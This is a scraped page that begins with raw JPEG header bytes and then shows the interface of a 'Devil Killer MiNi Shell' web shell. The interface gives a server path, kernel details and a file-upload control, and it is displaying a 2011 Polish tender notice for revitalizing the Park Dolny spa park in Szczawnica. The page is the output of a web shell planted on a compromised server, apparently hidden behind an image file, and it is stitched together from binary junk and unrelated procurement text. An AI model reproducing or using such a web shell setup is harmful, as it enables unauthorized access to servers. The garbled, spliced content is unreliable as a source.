JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110112/14309-N-2011.html

<p class="kh_header"><b>Szczawnica: Rewitalizacja uzdrowiskowego Parku Dolnego w Szczawnicy wraz z elementami małej architektury uzdrowiskowej</b><br>
<b>Numer ogłoszenia: 14309 - 2011; data zamieszczenia: 12.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Szczawnica , ul. Szalaya 103, 34-460 Szczawnica, woj. małopolskie, tel. 018 2622203, 2622530, faks 018 2622530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja uzdrowiskowego Parku Dolnego w Szczawnicy wraz z elementami małej architektury uzdrowiskowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Rewitalizacja uzdrowiskowego Parku Dolnego w Szczawnicy wraz z elementami małej architektury uzdrowiskowej

Całość robót powinna być wykonana zgodnie z:
a. Projektem wykonawczym pn.: Rewitalizacja uzdrowiskowego Parku Dolnego w Szczawnicy wraz z elementami małej architektury uzdrowiskowej
b. Uzyskanymi pozwoleniami i opiniami 
c. Przedmiarami robót
d. Wymaganiami materiałowo - technicznymi określonymi w szczegółowych specyfikacjach technicznych wykonania i odbioru robót (SST) 

Szczegółowe informacje oraz wgląd w dokumentację projektową stanowiącą załączniki do pism potwierdzających przyjęcie bez sprzeciwu przez Starostwo Powiatowe w Nowym Targu zgłoszeń robót nie wymagających pozwolenia na budowę możliwy będzie w Urzędzie Miasta i Gminy Szczawnica na pisemny wniosek oferentów.

Obszar projektowany zlokalizowany jest w Szczawnicy przy ulicy Głównej.
Inwestycja zlokalizowana jest na działkach 1150/5, 1150/6, 1151/2 obr. 1 Szczawnica.  

Cel i zakres opracowania.
Celem zamówienia jest wykonanie robót budowlanych na bazie Koncepcji Rewitalizacji parku Dolnego w Szczawnicy obejmującego:
	roboty drogowo - konstrukcyjne - aleje jezdne, ścieżki i chodniki dla pieszych, schody terenowe oraz schody przy altanie widokowej,
	nawodnienie,
	roboty branży wodnej, melioracyjnej i kanalizacyjnej w zakresie wymaganym ze względu na wprowadzone nowe elementy zagospodarowania terenu,
	rekultywacja zbiornika wodnego,
	roboty dotyczące sieci elektrycznej dla potrzeb nowoprojektowanego oświetlenia i iluminacji,
	roboty dotyczące zieleni oraz małej architektury Parku Dolnego.


Nawierzchnie
	Na głównych alejkach pieszych projektuje się nawierzchnie żwirowe typu hansegrand lub równoważna o kolorze Royal lub równoważnym. Jest to rodzaj nawierzchni przepuszczalnej. Właściwości techniczne nawierzchni umożliwiają poruszanie się po niej wózkom inwalidzkim.

Schody terenowe.
W północno zachodniej części parku projektuje się schody terenowe zlokalizowane na istniejącej skarpie. Schody projektuje się na przedłużeniu alei klonowej. Wychodzić one będą na ulicę Park Dolny graniczącą z parkiem od strony północnej. Ze względu na wysokość skarpy przewiduje się dwa biegi schodów. Dodatkowe schody terenowe projektuje się na zakończeniu ścieżki biegnącej po wschodniej stronie stawu łączącej główną aleję z ulicą Park Dolny.
	
Obsługa w zakresie infrastruktury i komunikacji.
Zaopatrzenie w energię elektryczną
Projektuje się oświetlenie parkowe oraz zasilanie pomp fontanny oraz technologii stawu, systemu nawadniającego a także kabel zasilający pod mającą powstać w przyszłości kawiarnię w parku. Budynek kawiarni objęty będzie oddzielnym zamówieniem. Zgodnie z warunkami Enion (Nr ZEKR6_ZS62657309) zakres obejmuje budowę przyłącza, rozbudowę sieci  oraz sieci wewnętrznych. Należy zdemontować istniejące oświetlenie wraz z kablami. Elementy nadające się do wykorzystania należy przekazać do Enion S.A. Szczegóły techniczne znajdują się w projekcie elektrycznym (tom V).

Odprowadzenie wód opadowych
	Woda opadowa z nawierzchni utwardzonych (alejki piesze, place, place zabaw) będzie odprowadzana na trawniki oraz bezpośrednio w grunt. 

Zaopatrzenie w wodę.
	Na terenie parku projektuje się przyłącz wodociągowy dla zasilania fontanny oraz systemu nawadniającego oraz lokalizację przyłącza dla mającej powstać w przyszłości kawiarni w parku (etap drugi projektu). 

Odprowadzenie wód sanitarnych.
	Na terenie parku projektuje się przyłącz do miejskiej kanalizacji burzowej dla odprowadzenia wody z maszynowni fontanny oraz zrzut z odwodnienia rurociągów systemu nawodnienia (zgodnie z warunkami RLKP-7050-2109). Projektuje się również przyłącz do kanalizacji sanitarnej dla odprowadzenia wody z mającej powstać w przyszłości kawiarni w parku (warunki Podhalańskie Przedsiębiorstwo Komunalne Sp. z o.o. WT 28WSz2009). 

Nawodnienie.
Na terenie parku projektuje się nawodnienie. Część przeznaczona do nawodnienia to dwie rabaty oznaczone R1 i R2 oraz część nasadzeń znajdujących się w otoczeniu ścieżek edukacyjnych. 

Wejścia na teren inwestycji i ogrodzenie
Projektuje się ogrodzenie parku wrotami jak na PZT. 

Place zabaw.
W Parku Dolnym projektuje się dwa place zabaw. Oba usytuowane będą w zachodniej części parku, w sąsiedztwie istniejącego parkingu przy alei Parkowej. Plac zabaw dla dzieci w wieku od 1 do 6 lat projektuje się w północno zachodniej części parku natomiast plac dla dzieci powyżej 6 lat w części południowo zachodniej. Oba place łączyć będzie ze sobą alejka z nieregularnych płyt kamiennych (granitowych).
Przy wejściach placów zabaw projektuje się tablice regulaminowe oraz kosze na śmieci.
Ścieżka łącząca place zabaw zaprojektowano z nieregularnych płyt granitowych:
4cm - płyta granitowa nieregularna (zielony granit)
3 cm- podbudowa z chudego betonu
20 cm - podbudowa z tłucznia
Projektuje się trzy rodzaje siedzisk drewnianych, różniących się od siebie średnicą oraz wysokością. Drewniane siedziska należy zabezpieczyć impregnacją wgłębną. Siedzisko jest zamocowane na stalowej stopce łączącej je z betonowym fundamentem.
Szczegóły techniczne siedzisk ujęto w części rysunkowej tom I zagospodarowanie terenu, rys projekt placów zabaw.

Pole Putting Green.
Obszar przeznaczony pod Putting Green zlokalizowany jest na tyłach budynku szaletów w sąsiedztwie placu zabaw dla dzieci. 
Putting Green zajmuje obszar 96m2 oraz posiada 6 dołków golfowych.  Na polu zostały wyróżnione również trzy wyspy wysypane żwirem, które mogą służyć do chippingu.

Nasadzenia.
Na obszarze Parku Dolnego  zaprojektowano nasadzenia. Ich układ oraz kształt nawiązuje do swobodnego planu założenia parkowego. Jako nasadzenia projektuje się trawy ozdobne, byliny, krzewy oraz drzewa odpowiednie dla  warunków klimatycznych oraz glebowych. Liczne nasadzenia wzbogacają florę parku , wyznaczają strefy rekreacji i wypoczynku. Jako urozmaicenie szaty roślinnej zaprojektowano ścieżki edukacyjne wraz z roślinnością. Są to nasadzenia skoncentrowane w obrębie wąskich ścieżek zlokalizowanych w zachodniej części parku. Nasadzenia te charakteryzują się różnorodnością kolorów oraz formy. Obraz bylin, krzewów oraz traw wraz z biegnącą rzeczką tworzy ciekawe wnętrze krajobrazowo-przyrodnicze. Na tym terenie zostaną umieszczone tabliczki informacyjne opisujące poszczególne gatunki roślin. 
Zaprojektowano 9600 m2 nasadzeń. Szczegółowy projekt nasadzeń ujęto w tomie II nasadzenia.

 Zbiornik wodny, kaskada i rów odwadniający.
Zgodnie z wytycznymi Miejscowego Planu Zagospodarowania Przestrzennego przewiduje się remont istniejącego zbiornika wodnego.
Istniejący staw o powierzchni ok. 1100m2 został wykonany dla celów technicznych w ramach prac górniczych wykonywanych w latach 60-tych. Ze względu na swoje ówczesne przeznaczenie, kształt jaki pozostał jest prosty i geometryczny. Staw zasilany jest wodą z 4 różnych źródeł. Spływają one odpływem z górnej części lasu znajdującego się od północnej  strony parku. Wody te mieszają się i  przepustem  przecinającym drogę na wysokości rzędnej +462,2  po skarpie wpływają do stawu na wysokości rzędnej +458,1.  Następnie woda ta odprowadzana jest do kanalizacji burzowej  o rzędnej + 456,5 rowem odwadniającym  o długości ok. 170m przechodzącym przez zachodnią część parku. Po wschodniej stronie stawu znajduje się również rów doprowadzający.

Zbiornik wodny
W ramach rewitalizacji stawu oraz rowu odwadniającego w Parku Dolnym projektuje się :

	Linia brzegowa
 Kształt stawu pozostaje bez zmian za wyjątkiem niewielkich zaokrągleń linii brzegowej przy komorze pompowni. Naturalny charakter linii brzegowej zostanie uzyskany poprzez nasadzenia roślinne strefy filtracyjne.
	Rośliny
 Projektuje się obsadzenie zbiornika wodnego roślinami wodnymi. Rośliny będą sadzone w grupach aby nadać zbiornikowi wodnemu naturalny charakter oraz wzbogacić jego obraz wodny.
	Pogłębienie stawu: Zbiornik wodny należy zniwelować oraz pogłębić zgodnie z rysunkami załączonymi w tomie I zagospodarowanie terenu część graficzna. 
	Skarpy 
Skarpy należy uformować do kąta naturalnego zsypu żwiru. Brzegi zbiornika obłożyć obrzeżami betonowymi o wym. 30x8cm posadowionych na suchym betonie
	Doszczelnienie i umocnienie zbiornik
Pogłębiony zbiornik wodny zostanie doszczelniony folią EPDM 1mm pomiędzy dwiema warstwami geowłókniny. Wierzchnia warstwa geowłókniny zostanie wyłożona 20cm warstwą żwiru płukanego 16-32mm.
Brzegi zbiornika zostaną zabezpieczone betonem (pod i na folii). Warstwa wierzchnia będzie posiadała wbudowany żwir płukany 8-32mm.
	           Układ filtracyjny i filtr mineralno-roślinny
Układ filtracyjny w stawie w Szczawnicy  polegać będzie na     zastosowaniu wstępnego filtra mechaniczno-mineralnego poprzez który woda tłoczona będzie do strefy filtra mineralno-roślinnego, a także zastosowane będzie urządzenie do defosforyzacji wody dopuszczanej do stawu.
		Dopust  wody
Woda , która ma zasilać staw w Szczawnicy ma kilkakrotnie przewyższone parametry, które obowiązują zgodnie z normami na dopust wody do stawów uszczelnionych widokowo-rekreacyjnych i dlatego zaprojektowano system dozowania środka defosforyzującego - koagulanta przeznaczonego do wody pitnej, który będzie miał za zadanie zredukować ilość fosforu w układzie wodnym. Należy wykonać dokładne badanie wody wodociągowej, która będzie zasilała staw (pierwsze zalanie stawu jak i uzupełnianie strat z ewapotranspiracji) i ustalić dawkę preparatu , który za pomocą pompy dozującej Grundfos DME 2-18 lub równoważna, będzie redukował ilość fosforu (ograniczając zakwity glonów nitkowatych). Dopust wody należy podłączyć do elektrozaworu MV 1 lub równoważny poprze pompę dozującą DME lub równoważna , który sterowany będzie za pomocą regulatora poziomu wody  EWR 1 lub równoważny i czujnika poziomu wody WSS 2000- 3 5 (lub równoważny) lub WSS 20-3 (lub równoważny) umieszczonego w stawie wraz z armaturą wielofunkcyjną UWK F 100E lub równoważna. Woda w sposób pulsacyjny dopływać będzie do komory osadnikowej i całego układu wodnego poprzez pompę zamontowaną w komorze osadnikowej wody ze źródła lub w okresach niedoboru wody będzie uzupełniana wodą wodociągową. 

Komora pompowni
Projektuje się pomieszczenie techniczne do obsługi filtracji i pomp zbiornika wodnego. Opis komory pompowni oraz spełnianych przez nią funkcji znajduje się w pkt. Zbiornik wodny.
Szczegóły techniczne dotyczące konstrukcji komory pompowni znajdują się 
w projekcie konstrukcji -  Konstrukcje (tom III).
Szczegóły techniczne dotyczące zasilania w prąd komory pompowni znajdują się w  projekcie elektrycznym (tom V).
Szczegóły techniczne zasilania w wodę oraz odprowadzenia ścieków znajdują się w projekcie zasilania i odprowadzenia wody (tom VI).

Kaskada
W północno-zachodniej części stawu projektuje się kaskadę wodną z ujściem do strefy filtracyjnej zbiornika wodnego.
Na szczycie kaskady przewiduje się komorę z dyszą wodną. Właz komory powinien być zabezpieczony przed dostępem osób niepowołanych.
Kaskada zbudowana będzie z kamienia naturalnego oraz posiadać będzie trzy progi wodne odpowiednio na wysokościach rzędnych: +461.5; +460.6 oraz +459.4.

Rów odprowadzający
Projektuje się nową linię rowu odprowadzającego wodę ze stawu- ok. 170mb.
W celu uzyskania łagodniejszej i ciekawszej linii rowu projektuje się nadanie mu meandrów poprzez zmianę linii jego biegu oraz przeprojektowanie jego skarp.

Fontanna
W części południowo centralnej parku, przy chodniku ulicy Głównej znajduje się nieczynna fontanna. Projekt uwzględnia remont fontanny wraz z budową niezbędnej do jej działania infrastruktury technicznej. Jako miejsce lokalizacji urządzeń technologicznych fontanny (a także systemu nawadniającego) projektuje się podziemną maszynownie o wymiarach  4,15m x 4,2m x 2,8m. Maszynownia będzie zlokalizowana w odległości 5m od fontanny w miejscu istniejącego trawnika.
Bryła oraz kształt fontanny pozostaje bez zmian. Wymagane jest tylko jej odrestaurowanie poprzez zabiegi remontowe konstrukcji (oczyszczenie, uszczelnienie, zabezpieczenie). Jako wykończenie korony niecki zaprojektowano obramowanie z kamienia mocowanego  na kleju.

       Maszynownia
Zaprojektowano podziemne pomieszczenie techniczne do obsługi technologii fontanny, w którym również lokalizuje się instalację do obsługi systemu nawadniającego. W maszynowni również zaprojektowano skrzynkę technologiczną oraz skrzynkę rozdzielczą dla fontanny. W maszynowni zaprojektowano  instalację wentylacyjną- grzewczą. Pomieszczenie o konstrukcji żelbetowej. Izolację powierzchni pionowych i poziomych należy wykonać z masy Superflex 10 lub równoważna. Następnie przykleić siatkę polipropylenową. Docieplenie maszynowni zaprojektowano z płyt polistyrenowych (styropianowych) w technologii Superflex lub równoważna. Izolacja przeciwwilgociowa oraz przeciwwodna zaprojektowana jest  z foli polietylenowej.

Grota dr Zyblikiewicza
Na terenie parku znajduje się historyczna grota. Zaprojektowano renowację tej groty. Należy usunąć powłokę malarską oraz przetrzeć tynki. Wszelkie szczeliny i ubytki uzupełnić oraz pomalować dwukrotnie. Kolor należy potwierdzić z projektantem na etapie nadzorów autorskich. Należy zdemontować zniszczoną balustradę.

Pomnik Poległych w II wojnie światowej.
W centralnej części  Parku Dolnego znajduje się Pomnik Poległych w II Wojnie światowej. Jest to postument, na którym widnieje rzeźba orła. Wokół pomnika znajduje się plac z płyt betonowych obramowany potężnym łańcuchem metalowym. 
W ramach przebudowy parku pomnik ten zmienia swoją lokalizację. Ponieważ park będzie ogrodzony i zamykany na noc, tuż przy ulicy Głównej projektuje się  poza obrębem ogrodzenia plac o powierzchni ok 250m2. Nawierzchnia placu tak jak pozostałe alejki w parku zaprojektowano w typie hansegrand lub równoważne. Na osi placu projektuje się nową lokalizację pomnika. Będzie on iluminowany, dwoma symetrycznymi punktami świetlnymi. Dodatkowo projektuje się punkty iluminacyjne wzdłuż ogrodzenia (szczegóły w tomie V). Miejsce po pomniku należy zrekultywować. 
       Edukacyjne ścieżki przyrodnicze.
Na terenie parku przewidziano lokalizację ścieżek edukacyjno - przyrodniczych. Ścieżki planuje się w części północno zachodniej, pomiędzy aleją klonową, zbiornikiem wodnym oraz kanałem wodnym biegnącym od zbiornika.
 Przy projektowanych grupach krzewów, bylin oraz istniejących drzewach przewiduje się usytuowanie tabliczek informacyjnych zawierających dane o: rodzinie pochodzenia rośliny, gatunkową nazwę polską oraz nazwę łacińską. 

Mostki/pomost.
W miejscach przecięcia się alejek pieszych z rowem odwadniającym biegnącym od zbiornika wodnego do południowo zachodniej granicy parku, projektuje się mostki M1, M2, M3 typ 1/typ2. 
Trzy mostki stalowe (M1) zaprojektowano na belkach stalowych na których spoczywają drewniane deski. Do podłużnych belek mocowane są stalowe balustrady. Fundamenty żelbetowe z betonu B25 W4, zbrojenie z prętów O7mm i O 8-14mm. Powierzchnie pionowe konstrukcji należy zaizolować wysokoelastyczną masą uszczelniającą Superflex D-1 lub równoważna. Elementy drewniane należy zaimpregnować preparatem VALTTI BASE (Tikkurila) lub równoważna, następnie  VALTTI COLOR (Tikkurila) lub równoważna. Balustradę stalową zabezpieczyć antykorozyjnie. Szczegółowe rozwiązania i rysunki w tomie III konstrukcje.
Na terenie placu zabaw dla dzieci od lat 1-6 zaprojektowano jeden mostek drewniany (M2). Fundamenty żelbetowe wykonane z betonu B25 W4, zbrojenie z prętów O 6-14mm. Konstrukcja nośna oraz balustrada mostku jest drewniana. Została zaprojektowana z drewna D30. Elementy drewniane należy zaimpregnować preparatem FOBOS M-4 lub równoważne (impregnacja ciśnieniowo- próżniowa), następnie preparatem VALTII BASE (Tikkurila) lub równoważne oraz VALTII COLOR (Tikkurila) lub równoważne.
 Na terenie parku zaprojektowano również trzy mostki drewniane ( M3typ 1/typ2). Mostki zaprojektowano na konstrukcji drewnianej palowej. Mostek typu 1 o szerokości 80 cm, mostek typu 2 o szerokości 1,20 m. Mostek typu 1 należy wykonać 1 sztukę , natomiast mostki o szerokości 1,2 2 sztuki. Mostki osadzona na drewnianych palach o śr 15 cm należy wbić na głębokość 1,4m. Pale muszą być zaimpregnowane ciśnieniowo do kontaktu z ziemią. Na palach  należy osadzić oczep o wymiarach 10x12cm. Ważne żeby oczep nie miał kontaktu z ziemią. Następnie belka podłużna 15x10 cm połączyć z oczepem.. Na belce podłużnej należy nabić deski o szerokości 12 cm i grubości 38 mm. Elementy drewniane muszą być zaimpregnowane preparatem VALTTI BASE (Tikkurila) lub równoważny. Do złączenia elementów najlepiej zastosować tradycyjne połączenia ciesielskie lub poduszcza się zastosowanie złączy metalowych. Mostki należy wykonać w nawiązaniu do projektu drogowego i dostosować według rzędnych projektu dróg.
 Szczegółowe rysunki i detale w tomie I zagospodarowanie.

W parku przewiduje się lokalizacje 
3 mostków stalowych:
- na alejce przechodzącej przy zbiorniku wodnym, prowadzącej pod Altanę Widokową,
- na alejce biegnącej od ul. Parkowej do ronda w parku
- na alei klonowej
1 mostek drewniany:
- na placu zabaw dla dzieci w wieku od 1-6 lat
3 mostki:
- na ścieżkach o szerokości od 0,8 -1,2 m na tak zwanej ścieżce edukacyjnej.

Bezpośrednio przy stawie projektuje się pomost drewniany zlokalizowany ponad lustrem wody. Pomost drewniany projektuje się nad komorą techniczną, w której zlokalizowane będą instalacje techniczne oczyszczania wody ze stawu oraz pompy zasilające fontannę i kaskadę. Szczegóły dotyczące konstrukcji pomostu znajdują się w tomie Konstrukcje (tom III).
Mała architektura.
	Na terenie Parku Dolnego  projektuje się elementy małej architektury takie jak: - ławki  z oparciami (proponowany typ Wenecja 001110 firmy Komserwis lub równoważne) zlokalizowane przy alejkach  i placach na osobnie wydzielonych utwardzonych placykach. 
- siedziska z drewna na nóżkach stalowych - na placach zabaw
- tablice regulaminowe placów zbaw (proponowany typ Agora 010240 firmy Komserwis lub równoważne)
- tablice regulaminowe parku (proponowany typ Agora 010240 firmy Komserwis lub równoważne)
- kosze na śmieci (proponowany typ Agora 003220 firmy Komserwis lub równoważne) 
Montaż ławek i koszy zgodnie z zaleceniami dostawcy.
	Ławki oraz kosze zlokalizowane są w sposób nie kolidujący z pasami dla ruchu pieszego - przy alejkach pozostawiając szerokie przejście (dostosowane do potrzeb osób niepełnosprawnych). 
	Istniejące tablice informacyjne zlokalizowane w granicach parku należy zdemontować. 
     
Karuzela.
W ramach rewitalizacji parku projektuje się karuzelę w zachodniej części parku. Karuzela usytuowana jest w bliskim sąsiedztwie placów zabaw, tworząc w ten sposób wspólną strefę rozrywki. Projektuje się karuzelę łańcuchową z 12 siedzeniami Lafayette Chair o plane firmy Peter-Petz (lub równoważne). Montaż zgodnie z zaleceniami producenta. 
Dla Karuzeli projektuje się przyłącz zasilający instalacji elektrycznej  (szczegóły w tomie V).
Altana  Widokowa  wypoczynkowa.
Na terenie parku znajduje się Altana Widokowa (wypoczynkowa) wpisana do rejestru zabytków. Zlokalizowana jest w północnej części parku niedaleko pensjonatu Maria. Jest to  obiekt który obecnie znajduje się w złym stanie technicznym. Wymaga ona remontu i odnowienia. Szczegółowy projekt budowlany objęty jest osobnym opracowaniem.
Dodatkowo po obu stronach altany zaprojektowano symetryczne  schody terenowe. W ten sposób zapewniona jest komunikacja między ulicą Park Dolny a terenem poniżej altany. Szczegółowy projekt schodów znajduje się w tomie  IV projekt drogowy.

Oświetlenie parkowe.
Projektuje się nowe słupy oświetleniowe firmy Art-metal model ST4 96 po zewnętrznej linii parku (wzdłuż ogrodzenia) oraz model F1A  04 na obszarze parku (lub równoważne).
Na terenie parku przewiduje się zastosowanie oświetlenia w postaci 76 szt słupów oświetleniowych oraz 69 punktów iluminacyjnych w rozróżnieniu na:
- lampy parkowe do oświetlenia alejek i placów na słupach o wysokości 4,7m i 5m
- oprawy do montażu w gruncie do iluminacji roślin
- iluminacje altany widokowej i muzycznej oraz groty i pomnika
Szczegóły techniczne dotyczące oświetlenia fontanny znajdują się w Projekt technologii wodnych i oświetlenia fontanny w Parku Dolnym w Szczawnicy (tom VIII).
Szczegóły techniczne dotyczące rodzajów opraw i słupów znajdują się w  projekcie elektrycznym (tom V).
		
Zestawienie zbiorcze elementów małej architektury.
Liczba ławek w parku                                         81 szt. (w obrębie ogrodzenia 68 szt.)
Siedziska drewniane S1, S2, S3                          5 szt.
Liczba koszy w parku                                         50 szt.
Karuzela                                                              1 szt.
Tablice informacyjne regulaminowe                   4 szt.
Putting green (6 dołków)                                     1 szt
Place zabaw	 (2-6 lat i 6-12 lat) 1060m2
Mostki pomosty	7szt ( z czego 4 mostki)
Ogrodzenie                                                           986mb
(bramy wejściowe                                                9szt
furtki)                                                                    3szt
Altana wypoczynkowa                                         1szt

Wskaźnik wielkości powierzchni nowej zabudowy w stosunku do powierzchni terenu inwestycji, w tym udział powierzchni biologicznie czynnej.
Wskaźnik z MPZP - wielkość powierzchni zabudowy w strefie A= 40%
Wskaźnik z MPZP - powierzchni biologicznie czynnej w strefie A = 60%

Powierzchnia całkowita: 3,965 ha = 100%
Powierzchnia alejek parkowych, placów, zbiornika wodnego: 0,765 ha = 20% ( w czym powierzchnia alejek parkowych utwardzonych, placów, zbiornika wodnego : 0,715 ha = 18%)
Powierzchnia biologicznie czynna: 3,25 ha = 82% (w tym powierzchnia zieleni: 3,20 ha = 80%)
Wielkość powierzchni zabudowy w projekcie  - 20%
Wielkość powierzchni biologicznie czynnej w projekcie - 80%
Warunki z MZPZ odnoście wskaźników powierzchni są spełnione.
Zestawienie powierzchni:
Powierzchnia całkowita parku				39650 m2
Powierzchnia nasadzeń					9600 m2
Powierzchnia trawiasta (bez ścieżek terenowych)		22380m2
Powierzchnia placów zabaw	1068 m2 
Powierzchnia nawierzchni utwardzonych 
(łącznie ze ścieżkami terenowymi)                                             4420 m2
Powierzchnia stawu					1120 m2
Grota fontanna Altana muzyczna 
Altana Widokowa Szalety z otoczeniem
powierzchnia rowu	 1062 m2

Dane dotyczące wpisu do rejestru zabytków.
Działki, na których planowana jest inwestycja rewitalizacji parku znajdują się w Strefie Ochrony Konserwatorskiej zespołów zabytkowych oraz przyległych do nich terenów podlegających ocenie gabarytów i charakteru zabudowy. Na terenie parku zlokalizowane są obiekty wpisane do rejestru zabytków (Altana Widokowa, Altana Muzyczna)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających w trybie zamówienia z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. 
Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówień, co w zamówieniu podstawowym, a więc zakresem rzeczowym odpowiadać będą charakterowi robót z przedmiarów robót oraz harmonogramu rzeczowo - finansowego.</li></ul>
